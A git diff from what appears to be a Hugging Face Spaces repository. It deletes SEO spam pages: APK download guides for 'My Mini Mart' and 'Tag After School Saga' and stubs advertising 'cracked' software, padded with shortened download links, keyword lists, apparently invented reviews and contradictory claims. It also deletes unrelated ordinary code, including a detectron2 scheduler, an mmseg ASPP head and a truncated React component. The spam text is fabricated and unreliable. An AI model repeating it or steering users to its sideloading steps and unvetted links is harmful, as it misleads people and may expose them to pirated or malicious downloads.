    Do you dream of running your own mini mart and growing it into a successful business empire? If so, you should download My Mini Mart APK for Android, a free simulation game created by Supersonic Studios LTD. In this game, you can grow organic plants, tend to your animals, and sell your produce to customers. As you progress, you can hire employees, build and expand your marts. You can also enjoy a relaxing yet challenging gameplay that will keep you hooked for hours. In this article, we will tell you more about the features of My Mini Mart APK, how to download and install it on your device, the pros and cons of this game, some alternatives you can try, and some frequently asked questions.

    -

    download my mini mart apk


    Download ——— https://urlca.com/2uOcbD



    -

    Features of My Mini Mart APK

    -

    My Mini Mart APK is a fun and unique simulation game that lets you experience the thrill of running your own mini mart. Here are some of the features that make this game stand out:

    -
      -
    • Grow organic plants, tend to animals, and sell produce to customers. In this game, you can grow various crops and fruits in your garden, raise chickens, cows, pigs, and other animals in your farm, and sell your fresh and healthy products to your customers. You can also cook delicious dishes with your ingredients and serve them to your hungry patrons.
    • -
    • Hire employees, build and expand your marts. As your business grows, you can hire more staff to help you with different tasks such as planting, harvesting, cooking, serving, cleaning, etc. You can also build new stores in different locations and expand your marts with more shelves, counters, cash registers, etc. You can also decorate your marts with various items to make them more attractive and appealing.
    • -
    • Relaxing yet challenging gameplay. My Mini Mart APK is both a relaxing and challenging game that will test your management skills and creativity. You can play at your own pace and enjoy the soothing music and graphics. You can also face various challenges such as meeting customer demands, managing inventory, dealing with competitors, etc. You can also unlock new levels, items, upgrades, achievements, etc. as you progress.
    • -
    -

    How to download and install My Mini Mart APK

    -

    If you want to download and install My Mini Mart APK on your Android device, you need to follow these simple steps:

    -
      -
    1. Find a reliable source for the APK file. You can't find My Mini Mart APK on Google Play Store or other official app stores. You need to find a trustworthy website that offers the latest version of the APK file. For example, you can use [APKCombo](^2^) or [Softonic](^1^) to download the APK file for free. Make sure you check the reviews, ratings, and comments of other users before downloading the file.
    2. -
    3. Enable unknown sources on your device. Since you are downloading the APK file from a third-party source, you need to enable unknown sources on your device to allow the installation. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to grant some permissions to the app such as storage, camera, microphone, etc.
    4. -
    5. Download the APK file and tap on it to install. Once you have found a reliable source and enabled unknown sources, you can download the APK file and save it on your device. Then, locate the file and tap on it to start the installation process. Follow the instructions on the screen and wait for the installation to complete.
    6. -
    7. Launch the game and enjoy. After the installation is done, you can launch the game from your app drawer or home screen. You can now enjoy playing My Mini Mart APK on your Android device.
    8. -
    -

    Pros and cons of My Mini Mart APK

    -

    Like any other game, My Mini Mart APK has its pros and cons. Here are some of them:

    - - - - - - - - - -
Pros and Cons (pros listed first, then cons):
      -
    • Free. You don't have to pay anything to download and play My Mini Mart APK. It is completely free of charge and does not require any subscription or registration.
    • -
    • Fun. My Mini Mart APK is a fun and addictive game that will keep you entertained for hours. You can enjoy growing your own mini mart empire and managing various aspects of your business.
    • -
    • Unique. My Mini Mart APK is a unique simulation game that combines farming, cooking, and selling in one. You can experience different activities and challenges in this game that you won't find in other games.
    • -
    • No ads, no in-app purchases. My Mini Mart APK does not have any annoying ads or in-app purchases that will interrupt your gameplay or tempt you to spend money. You can play the game without any distractions or limitations.
    • -
      -
    • Prone to crashes and lags. Some users have reported that My Mini Mart APK crashes or lags frequently on their devices. This can affect your gameplay and cause frustration. You may need to update your device or clear some cache to fix this issue.
    • -
    • Requires internet connection. My Mini Mart APK requires an internet connection to run properly. You cannot play the game offline or without a stable network. This can be a problem if you have a limited data plan or a poor signal.
    • -
    • May not be compatible with some devices. My Mini Mart APK may not work well on some devices due to different specifications or operating systems. You may encounter some errors or glitches while playing the game on your device. You may need to check the compatibility of your device before downloading the game.
    • -
    -

    Alternatives to My Mini Mart APK

    -

    If you are looking for some alternatives to My Mini Mart APK, here are some games that you can try:

    -
      -
    • [Supra Drift Simulator]. This is a realistic car drifting game that lets you drive various models of Supra cars on different tracks. You can customize your car, perform stunts, and compete with other players online.
    • -
    • [Fashion Universe]. This is a fashion simulation game that lets you create your own avatar, design your own clothes, accessories, and hairstyles, and run your own fashion boutique. You can also interact with other players, join events, and explore different locations.
    • -
    • [Block Puzzle Jewel : Gem Legend]. This is a classic block puzzle game that challenges you to match colorful jewels and clear the board. You can enjoy various modes, levels, and themes in this game.
    • -
    -

    Conclusion

    -

    In conclusion, My Mini Mart APK is a free simulation game that lets you run your own mini mart business. You can grow organic plants, tend to animals, cook dishes, sell products, hire employees, build stores, and more in this game. You can also enjoy a relaxing yet challenging gameplay that will test your skills and creativity. However, you should also be aware of some drawbacks of this game such as crashes, lags, internet requirement, and compatibility issues. If you are looking for some alternatives to this game, you can try Supra Drift Simulator, Fashion Universe, Block Puzzle Jewel : Gem Legend, etc. If you are interested in downloading and playing My Mini Mart APK, you can follow the steps we have provided in this article. We hope you have found this article helpful and informative. Thank you for reading and have a great day!

    -

    Download my mini mart apk for android free
    -How to download my mini mart apk on PC
    -Download my mini mart apk latest version
    -Download my mini mart apk mod unlimited money
    -Download my mini mart apk offline
    -Download my mini mart apk from softonic
    -Download my mini mart apk from apkcombo
    -Download my mini mart apk without ads
    -Download my mini mart apk and play online
    -Download my mini mart apk and grow your business
    -Download my mini mart apk and enjoy simulation game
    -Download my mini mart apk and manage your store
    -Download my mini mart apk and hire employees
    -Download my mini mart apk and expand your marts
    -Download my mini mart apk and sell organic produce
    -Download my mini mart apk and tend to your animals
    -Download my mini mart apk and challenge yourself
    -Download my mini mart apk and relax
    -Download my mini mart apk and become a tycoon
    -Download my mini mart apk and review it
    -Download my mini mart apk and share it with friends
    -Download my mini mart apk and rate it
    -Download my mini mart apk and get tips and tricks
    -Download my mini mart apk and join the community
    -Download my mini mart apk and watch videos
    -Download my mini mart apk and compare with other games
    -Download my mini mart apk and learn from other players
    -Download my mini mart apk and customize your marts
    -Download my mini mart apk and unlock new features
    -Download my mini mart apk and earn rewards
    -Download my mini mart apk and have fun
    -Download my mini mart apk and support the developers
    -Download my mini mart apk and give feedback
    -Download my mini mart apk and report bugs
    -Download my mini mart apk and update it regularly
    -Download my mini mart apk and install it easily
    -Download my mini mart apk and run it smoothly
    -Download my mini mart apk and save your progress
    -Download my mini mart apk and restore your data
    -Download my mini mart apk and play offline or online
    -Download my mini mart apk and compete with others
    -Download my mini mart apk and achieve goals
    -Download my mini mart apk and explore more games by Supersonic Studios LTD
    -Download my mini mart apk and discover new genres of games
    -Download my mini mart apk and improve your skills
    -Download my mini mart apk and create your own empire
    -Download my mini mart apk and experience a unique game
    -Download my mini mart apk and enjoy the graphics

    -

    FAQs

    -

    Here are some frequently asked questions about My Mini Mart APK:

    -
      -
    1. Is My Mini Mart APK safe to download? Yes, My Mini Mart APK is safe to download as long as you use a reliable source for the APK file. However, you should always scan the file for viruses or malware before installing it on your device.
    2. -
    3. How can I update My Mini Mart APK? You can update My Mini Mart APK by downloading the latest version of the APK file from the same source you used before. You can also check the official website or social media pages of the developers for any news or updates about the game.
    4. -
    5. How can I contact the developers of My Mini Mart APK? You can contact the developers of My Mini Mart APK by sending them an email at support@supersonic.com. You can also follow them on Facebook, Twitter, Instagram, or YouTube for more information and feedback.
    6. -
    7. What are the minimum requirements for My Mini Mart APK? The minimum requirements for My Mini Mart APK are Android 5.0 or higher, 2 GB of RAM, and 100 MB of free storage space.
    8. -
    9. Can I play My Mini Mart APK offline? No, you cannot play My Mini Mart APK offline. You need an internet connection to play the game and access all its features.
    10. -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md b/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md deleted file mode 100644 index bbb47d17abc123647af6fb9dcdecae75ba042e42..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md +++ /dev/null @@ -1,137 +0,0 @@ -
    -

    Tag After School Saga Download: A Guide to the Horror and Mystery Game

    -

    If you are looking for a thrilling and immersive horror and mystery game for your Android device, you might want to check out Tag After School Saga. This game will take you on a spooky adventure in a haunted school where you have to explore, interact, and survive. In this article, we will tell you everything you need to know about Tag After School Saga, including how to download it, what are its features, what are some tips and tricks for playing it, and what are some reviews of it. Let's get started!

    -

    What is Tag After School Saga?

    -

    Tag After School Saga is a horror and mystery game developed by DottoruGames. The game is inspired by the Japanese urban legend of "Houkago no Onigokko", which means "After School Tag". According to this legend, there is a ghost that haunts schools after dark and plays tag with anyone who dares to enter. The ghost can take various forms, such as a girl in a red dress, a headless mannequin, or a bloody hand. The only way to escape from the ghost is to find a way out of the school before it catches you.

    -

    tag after school saga download


    Download File ☆☆☆☆☆ https://urlca.com/2uO8uC



    -

    In Tag After School Saga, you play as Shota-Kun, a curious student who decides to explore his school at night with his friends. However, things go wrong when they encounter the ghost of a girl who was killed in an accident. She challenges them to a game of tag and traps them inside the school. Now, you have to find your friends, solve puzzles, collect clues, and avoid the ghost's attacks. The game has multiple endings depending on your choices and actions.

    -

    How to download Tag After School Saga for Android?

    -

    Tag After School Saga is not available on the official Google Play Store, but you can still download it from other sources. Here are some of the ways you can get the game on your Android device:

    -

    Method 1: Download from APKCombo

    -

    APKCombo is a website that offers free APK files for various Android apps and games. You can download Tag After School Saga from APKCombo by following these steps:

    -
      -
    1. Go to [1](https://apkcombo.com/tag-after-school-saga-game/com.tagafterallymod.tag74/) on your browser.
    2. -
    3. Click on the green "Download APK" button.
    4. -
    5. Select the version and architecture that matches your device.
    6. -
    7. Wait for the download to finish.
    8. -
    9. Open the downloaded file and install it on your device.
    10. -
    11. Enjoy playing Tag After School Saga!
    12. -
    -

    Method 2: Download from LDPlayer

    -

    LDPlayer is an Android emulator that allows you to play Android games on your PC. You can download Tag After School Saga from LDPlayer by following these steps:

    -
      -
    1. Go to [3](https://www.ldplayer.net/games/com-tagafterallymod-tag74-on-pc.html) on your browser.
    2. -
    3. Click on the blue "Download LDPlayer" button.
    4. -
    5. Run the installer and follow the instructions to install LDPlayer on your PC.
    6. -
    7. Launch LDPlayer and search for "Tag After School Saga" in the built-in app store.
    8. -
    9. Click on the game icon and install it on LDPlayer.
    10. -
    11. Enjoy playing Tag After School Saga on your PC!
    12. -
    -

    Method 3: Download from QooApp

    -

    QooApp is an app store that offers Asian games for Android devices. You can download Tag After School Saga from QooApp by following these steps:

    -
      -
    1. Go to [5](https://apps.qoo-app.com/en/app/17541) on your browser.
    2. -
    3. Click on the blue "Download QooApp" button.
    4. -
    5. Open the downloaded file and install QooApp on your device.
    6. -
    7. Launch QooApp and search for "Tag After School Saga" in the app.
    8. -
    9. Click on the game icon and install it on your device.
    10. -
    11. Enjoy playing Tag After School Saga!
    12. -
    -

    What are the features of Tag After School Saga?

    -

    Tag After School Saga is a game that offers a lot of features for horror and mystery fans. Some of the features are:

    -

    tag after school game pc download
    -tag after school apk download free
    -tag after school horror game
    -tag after school game walkthrough
    -tag after school game review
    -tag after school game android
    -tag after school game ios
    -tag after school game online
    -tag after school game wiki
    -tag after school game characters
    -tag after school game endings
    -tag after school game cheats
    -tag after school game reddit
    -tag after school game steam
    -tag after school game mod apk
    -tag after school game guide
    -tag after school game tips
    -tag after school game trailer
    -tag after school game gameplay
    -tag after school game download for windows 10
    -tag after school game download for mac
    -tag after school game download for laptop
    -tag after school game download for chromebook
    -tag after school game download for linux
    -tag after school game download for ubuntu
    -tag after school game emulator download
    -tag after school game ldplayer download
    -tag after school game bluestacks download
    -tag after school game noxplayer download
    -tag after school game memu download
    -tag after school game latest version download
    -tag after school game update download
    -tag after school game patch download
    -tag after school game crack download
    -tag after school game full version download
    -tag after school game english version download
    -tag after school game japanese version download
    -tag after school game chinese version download
    -tag after school game korean version download
    -tag after school game genius studio japan inc. download
    -how to download tag after school game on pc
    -how to download tag after school game on android
    -how to download tag after school game on ios
    -how to play tag after school game on pc
    -how to play tag after school game on android
    -how to play tag after school game on ios
    -where to download tag after school game for pc
    -where to download tag after school game for android
    -where to download tag after school game for ios

    -

    Characters

    -

    The game has a cast of interesting and diverse characters that you can interact with. You can choose to play as Shota-Kun, the main protagonist, or as one of his friends, such as Yuki-Chan, Rika-Chan, or Hiro-Kun. Each character has their own personality, backstory, and relationship with the others. You can also encounter other characters, such as the ghost girl, the school staff, or other students.

    -

    Storylines

    -

    The game has multiple storylines that you can follow depending on your choices and actions. You can explore different areas of the school, such as the classrooms, the library, the gym, or the rooftop. You can also find different clues and items that can help you solve puzzles and unlock secrets. The game has different endings that can be happy, sad, or scary depending on your outcome.

    -

    Gameplay

    -

    The game has a gameplay that combines horror and mystery elements. You have to use your wits and skills to avoid the ghost's attacks and find a way out of the school. You can also use your phone to communicate with your friends, check your map, or take photos. The game has a timer that counts down from 60 minutes to zero. If you don't escape before the time runs out, you will lose the game.

    -

    Graphics

    -

    The game has a graphics that are realistic and detailed. The game uses 3D models and animations for the characters and environments. The game also uses lighting and sound effects to create a spooky atmosphere. The game has a camera system that allows you to switch between first-person and third-person views.

    -

    What are some tips and tricks for playing Tag After School Saga?

    -

    If you want to enjoy Tag After School Saga and survive the ghost's tag, here are some tips and tricks that you can use:

    -

    Tip 1: Save frequently

    -

    The game allows you to save your progress at any time by using your phone. You should save frequently in case you make a wrong decision or get caught by the ghost. You can also load your previous save if you want to try a different path or outcome.

    -

    Tip 2: Explore thoroughly

    -

    The game has a lot of hidden items and clues that you can find by exploring every corner of the school. You should check every door, drawer, locker, bookshelf, etc. for anything useful or interesting. You might find keys, notes, photos, or other items that can help you solve puzzles or unlock secrets.

    -

    Tip 3: Use your phone wisely

    -

    Your phone is your best friend in this game. You can use it to call or text your friends for help or information. You can also use it to check your map for your location and objectives. You can also use it to take photos of anything suspicious or important. However, you should be careful not to use it too much or too loudly, as it might attract the ghost's attention or drain your battery.

    -

    Tip 4: Be stealthy

    -

    The ghost is always roaming around the school looking for you. You should be stealthy and avoid making any noise or movement that might alert her. You can hide in closets, under desks, behind curtains, etc. if you see her coming. You can also run away from her if she spots you, but be careful not to bump into anything or fall down stairs.

    -

    Tip 5: Be brave

    -

    The game is designed to scare you and challenge you and test your courage. You should be brave and face your fears. The game has a lot of surprises and twists that will keep you on the edge of your seat. You should also be prepared for some gore and violence, as the game does not shy away from showing the consequences of the ghost's wrath. The game is not for the faint of heart, but for those who love horror and mystery.

    -

    What are some reviews of Tag After School Saga?

    -

    Tag After School Saga is a game that has received mixed reviews from players and critics. Some of the reviews are:

    -

    Positive reviews

    -

    "This game is amazing! It's so scary and immersive. I love the graphics and the sound effects. The story is also very intriguing and unpredictable. I recommend this game to anyone who likes horror and mystery games." - A user from APKCombo

    -

    "I really enjoyed this game. It's like a horror movie that you can play. The ghost is very creepy and unpredictable. The puzzles are also challenging and fun. The game has a lot of replay value, as you can try different paths and endings." - A user from LDPlayer

    -

    "This game is one of the best horror games I have ever played. It's very realistic and detailed. The characters are also very well-developed and relatable. The game has a lot of suspense and tension, as you never know when the ghost will appear or what she will do." - A user from QooApp

    -

    Negative reviews

    -

    "This game is terrible! It's so buggy and glitchy. It crashes all the time and freezes my device. The controls are also very clunky and unresponsive. The game is also very boring and repetitive. It's just running around the same school over and over again." - A user from APKCombo

    -

    "I hated this game. It's so cheap and low-quality. The graphics are awful and pixelated. The sound effects are annoying and loud. The story is also very lame and cliché. The game is also very easy and short. I finished it in less than an hour." - A user from LDPlayer

    -

    "This game is not for me. It's too scary and violent. I couldn't handle the ghost's attacks and the gore scenes. The game also gave me nightmares and anxiety. I regret playing this game." - A user from QooApp

    -

    Conclusion

    -

    Tag After School Saga is a horror and mystery game that will take you on a spooky adventure in a haunted school where you have to explore, interact, and survive. The game has a lot of features, such as characters, storylines, gameplay, graphics, etc. The game also has a lot of tips and tricks, such as saving frequently, exploring thoroughly, using your phone wisely, being stealthy, and being brave. The game also has a lot of reviews, both positive and negative, from players and critics.

    -

    If you are interested in playing Tag After School Saga, you can download it from various sources, such as APKCombo, LDPlayer, or QooApp. However, be warned that the game is not for everyone, as it can be scary, violent, buggy, or boring depending on your preferences.

    -

    Are you ready to play Tag After School Saga? Do you think you can escape from the ghost's tag? Download the game now and find out!

    -

    FAQs

    -

    Q: Is Tag After School Saga free?

    -

    A: Yes, Tag After School Saga is free to download and play.

    -

    Q: Is Tag After School Saga safe?

    -

    A: Tag After School Saga is safe to download and play from reputable sources, such as APKCombo, LDPlayer, or QooApp. However, you should always scan any file before installing it on your device.

    -

    Q: Is Tag After School Saga online or offline?

    -

    A: Tag After School Saga is an offline game that does not require an internet connection to play.

    -

    Q: How long is Tag After School Saga?

    -

              A: A single playthrough of Tag After School Saga takes about 60 minutes, though the game has multiple endings that vary depending on your choices and actions.
          

    -

    Q: How can I contact the developer of Tag After School Saga?

    -

    A: You can contact the developer of Tag After School Saga by visiting their website [6](https://dottorugames.com/) or by sending them an email at dottorugames@gmail.com.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md b/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md deleted file mode 100644 index 0d3e759a61618991032371ddf9f6047190fc238b..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md +++ /dev/null @@ -1,6 +0,0 @@ -

    diracliveroomcorrectionsuitecracked12


    DOWNLOADhttps://ssurll.com/2uzvCL



    - - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md b/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md deleted file mode 100644 index 8fb9556d8e1a438c9ca52c0038fb4417b5ce7b2c..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Edt Monoposte 2012 Crackl


    Download ✑ ✑ ✑ https://ssurll.com/2uzy3I



    - - 1fdad05405
    -
    -
    -

    diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py deleted file mode 100644 index d6aed2bb20c418bf6cc5594c1244b241796d7086..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import math -from bisect import bisect_right -from typing import List -import torch -from fvcore.common.param_scheduler import ( - CompositeParamScheduler, - ConstantParamScheduler, - LinearParamScheduler, - ParamScheduler, -) - -try: - from torch.optim.lr_scheduler import LRScheduler -except ImportError: - from torch.optim.lr_scheduler import _LRScheduler as LRScheduler - -logger = logging.getLogger(__name__) - - -class WarmupParamScheduler(CompositeParamScheduler): - """ - Add an initial warmup stage to another scheduler. - """ - - def __init__( - self, - scheduler: ParamScheduler, - warmup_factor: float, - warmup_length: float, - warmup_method: str = "linear", - rescale_interval: bool = False, - ): - """ - Args: - scheduler: warmup will be added at the beginning of this scheduler - warmup_factor: the factor w.r.t the initial value of ``scheduler``, e.g. 0.001 - warmup_length: the relative length (in [0, 1]) of warmup steps w.r.t the entire - training, e.g. 0.01 - warmup_method: one of "linear" or "constant" - rescale_interval: whether we will rescale the interval of the scheduler after - warmup - """ - end_value = scheduler(warmup_length) # the value to reach when warmup ends - start_value = warmup_factor * scheduler(0.0) - if warmup_method == "constant": - warmup = ConstantParamScheduler(start_value) - elif warmup_method == "linear": - warmup = LinearParamScheduler(start_value, end_value) - else: - raise ValueError("Unknown warmup method: {}".format(warmup_method)) - super().__init__( - [warmup, scheduler], - interval_scaling=["rescaled", "rescaled" if rescale_interval else "fixed"], - lengths=[warmup_length, 1 - warmup_length], - ) - - -class LRMultiplier(LRScheduler): - """ - A LRScheduler which uses fvcore :class:`ParamScheduler` to multiply the - learning rate of each param in the optimizer. - Every step, the learning rate of each parameter becomes its initial value - multiplied by the output of the given :class:`ParamScheduler`. - - The absolute learning rate value of each parameter can be different. - This scheduler can be used as long as the relative scale among them do - not change during training. - - Examples: - :: - LRMultiplier( - opt, - WarmupParamScheduler( - MultiStepParamScheduler( - [1, 0.1, 0.01], - milestones=[60000, 80000], - num_updates=90000, - ), 0.001, 100 / 90000 - ), - max_iter=90000 - ) - """ - - # NOTES: in the most general case, every LR can use its own scheduler. - # Supporting this requires interaction with the optimizer when its parameter - # group is initialized. For example, classyvision implements its own optimizer - # that allows different schedulers for every parameter group. - # To avoid this complexity, we use this class to support the most common cases - # where the relative scale among all LRs stay unchanged during training. In this - # case we only need a total of one scheduler that defines the relative LR multiplier. 
- - def __init__( - self, - optimizer: torch.optim.Optimizer, - multiplier: ParamScheduler, - max_iter: int, - last_iter: int = -1, - ): - """ - Args: - optimizer, last_iter: See ``torch.optim.lr_scheduler.LRScheduler``. - ``last_iter`` is the same as ``last_epoch``. - multiplier: a fvcore ParamScheduler that defines the multiplier on - every LR of the optimizer - max_iter: the total number of training iterations - """ - if not isinstance(multiplier, ParamScheduler): - raise ValueError( - "_LRMultiplier(multiplier=) must be an instance of fvcore " - f"ParamScheduler. Got {multiplier} instead." - ) - self._multiplier = multiplier - self._max_iter = max_iter - super().__init__(optimizer, last_epoch=last_iter) - - def state_dict(self): - # fvcore schedulers are stateless. Only keep pytorch scheduler states - return {"base_lrs": self.base_lrs, "last_epoch": self.last_epoch} - - def get_lr(self) -> List[float]: - multiplier = self._multiplier(self.last_epoch / self._max_iter) - return [base_lr * multiplier for base_lr in self.base_lrs] - - -""" -Content below is no longer needed! -""" - -# NOTE: PyTorch's LR scheduler interface uses names that assume the LR changes -# only on epoch boundaries. We typically use iteration based schedules instead. -# As a result, "epoch" (e.g., as in self.last_epoch) should be understood to mean -# "iteration" instead. - -# FIXME: ideally this would be achieved with a CombinedLRScheduler, separating -# MultiStepLR with WarmupLR but the current LRScheduler design doesn't allow it. - - -class WarmupMultiStepLR(LRScheduler): - def __init__( - self, - optimizer: torch.optim.Optimizer, - milestones: List[int], - gamma: float = 0.1, - warmup_factor: float = 0.001, - warmup_iters: int = 1000, - warmup_method: str = "linear", - last_epoch: int = -1, - ): - logger.warning( - "WarmupMultiStepLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!" - ) - if not list(milestones) == sorted(milestones): - raise ValueError( - "Milestones should be a list of" " increasing integers. Got {}", milestones - ) - self.milestones = milestones - self.gamma = gamma - self.warmup_factor = warmup_factor - self.warmup_iters = warmup_iters - self.warmup_method = warmup_method - super().__init__(optimizer, last_epoch) - - def get_lr(self) -> List[float]: - warmup_factor = _get_warmup_factor_at_iter( - self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor - ) - return [ - base_lr * warmup_factor * self.gamma ** bisect_right(self.milestones, self.last_epoch) - for base_lr in self.base_lrs - ] - - def _compute_values(self) -> List[float]: - # The new interface - return self.get_lr() - - -class WarmupCosineLR(LRScheduler): - def __init__( - self, - optimizer: torch.optim.Optimizer, - max_iters: int, - warmup_factor: float = 0.001, - warmup_iters: int = 1000, - warmup_method: str = "linear", - last_epoch: int = -1, - ): - logger.warning( - "WarmupCosineLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!" - ) - self.max_iters = max_iters - self.warmup_factor = warmup_factor - self.warmup_iters = warmup_iters - self.warmup_method = warmup_method - super().__init__(optimizer, last_epoch) - - def get_lr(self) -> List[float]: - warmup_factor = _get_warmup_factor_at_iter( - self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor - ) - # Different definitions of half-cosine with warmup are possible. For - # simplicity we multiply the standard half-cosine schedule by the warmup - # factor. 
An alternative is to start the period of the cosine at warmup_iters - # instead of at 0. In the case that warmup_iters << max_iters the two are - # very close to each other. - return [ - base_lr - * warmup_factor - * 0.5 - * (1.0 + math.cos(math.pi * self.last_epoch / self.max_iters)) - for base_lr in self.base_lrs - ] - - def _compute_values(self) -> List[float]: - # The new interface - return self.get_lr() - - -def _get_warmup_factor_at_iter( - method: str, iter: int, warmup_iters: int, warmup_factor: float -) -> float: - """ - Return the learning rate warmup factor at a specific iteration. - See :paper:`ImageNet in 1h` for more details. - - Args: - method (str): warmup method; either "constant" or "linear". - iter (int): iteration at which to calculate the warmup factor. - warmup_iters (int): the number of warmup iterations. - warmup_factor (float): the base warmup factor (the meaning changes according - to the method used). - - Returns: - float: the effective warmup factor at the given iteration. - """ - if iter >= warmup_iters: - return 1.0 - - if method == "constant": - return warmup_factor - elif method == "linear": - alpha = iter / warmup_iters - return warmup_factor * (1 - alpha) + alpha - else: - raise ValueError("Unknown warmup method: {}".format(method)) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py deleted file mode 100644 index 5ca99dc3eda05ef980d9a4249b50deca8273b6cc..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py +++ /dev/null @@ -1,23 +0,0 @@ -import warnings - -import torch - -from annotator.uniformer.mmcv.utils import digit_version - - -def is_jit_tracing() -> bool: - if (torch.__version__ != 'parrots' - and digit_version(torch.__version__) >= digit_version('1.6.0')): - on_trace = torch.jit.is_tracing() - # In PyTorch 1.6, torch.jit.is_tracing has a bug. - # Refers to https://github.com/pytorch/pytorch/issues/42448 - if isinstance(on_trace, bool): - return on_trace - else: - return torch._C._is_tracing() - else: - warnings.warn( - 'torch.jit.is_tracing is only supported after v1.6.0. ' - 'Therefore is_tracing returns False automatically. Please ' - 'set on_trace manually if you are using trace.', UserWarning) - return False diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py deleted file mode 100644 index aa914b5bb25124d1ff199553d96713d6a80484c0..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py +++ /dev/null @@ -1,107 +0,0 @@ -import torch -import torch.nn as nn -from annotator.uniformer.mmcv.cnn import ConvModule - -from annotator.uniformer.mmseg.ops import resize -from ..builder import HEADS -from .decode_head import BaseDecodeHead - - -class ASPPModule(nn.ModuleList): - """Atrous Spatial Pyramid Pooling (ASPP) Module. - - Args: - dilations (tuple[int]): Dilation rate of each layer. - in_channels (int): Input channels. - channels (int): Channels after modules, before conv_seg. - conv_cfg (dict|None): Config of conv layers. - norm_cfg (dict|None): Config of norm layers. - act_cfg (dict): Config of activation layers. 
- """ - - def __init__(self, dilations, in_channels, channels, conv_cfg, norm_cfg, - act_cfg): - super(ASPPModule, self).__init__() - self.dilations = dilations - self.in_channels = in_channels - self.channels = channels - self.conv_cfg = conv_cfg - self.norm_cfg = norm_cfg - self.act_cfg = act_cfg - for dilation in dilations: - self.append( - ConvModule( - self.in_channels, - self.channels, - 1 if dilation == 1 else 3, - dilation=dilation, - padding=0 if dilation == 1 else dilation, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - - def forward(self, x): - """Forward function.""" - aspp_outs = [] - for aspp_module in self: - aspp_outs.append(aspp_module(x)) - - return aspp_outs - - -@HEADS.register_module() -class ASPPHead(BaseDecodeHead): - """Rethinking Atrous Convolution for Semantic Image Segmentation. - - This head is the implementation of `DeepLabV3 - `_. - - Args: - dilations (tuple[int]): Dilation rates for ASPP module. - Default: (1, 6, 12, 18). - """ - - def __init__(self, dilations=(1, 6, 12, 18), **kwargs): - super(ASPPHead, self).__init__(**kwargs) - assert isinstance(dilations, (list, tuple)) - self.dilations = dilations - self.image_pool = nn.Sequential( - nn.AdaptiveAvgPool2d(1), - ConvModule( - self.in_channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - self.aspp_modules = ASPPModule( - dilations, - self.in_channels, - self.channels, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.bottleneck = ConvModule( - (len(dilations) + 1) * self.channels, - self.channels, - 3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - aspp_outs = [ - resize( - self.image_pool(x), - size=x.size()[2:], - mode='bilinear', - align_corners=self.align_corners) - ] - aspp_outs.extend(self.aspp_modules(x)) - aspp_outs = torch.cat(aspp_outs, dim=1) - output = self.bottleneck(aspp_outs) - output = self.cls_seg(output) - return output diff --git a/spaces/cozyanduofen/bingo/src/components/ui/select.tsx b/spaces/cozyanduofen/bingo/src/components/ui/select.tsx deleted file mode 100644 index 77f12c2996f541b97663de4c9e20ab34d4ec2fac..0000000000000000000000000000000000000000 --- a/spaces/cozyanduofen/bingo/src/components/ui/select.tsx +++ /dev/null @@ -1,123 +0,0 @@ -'use client' - -import * as React from 'react' -import * as SelectPrimitive from '@radix-ui/react-select' - -import { cn } from '@/lib/utils' -import { - IconArrowDown, - IconCheck, - IconChevronUpDown -} from '@/components/ui/icons' - -const Select = SelectPrimitive.Root - -const SelectGroup = SelectPrimitive.Group - -const SelectValue = SelectPrimitive.Value - -const SelectTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, 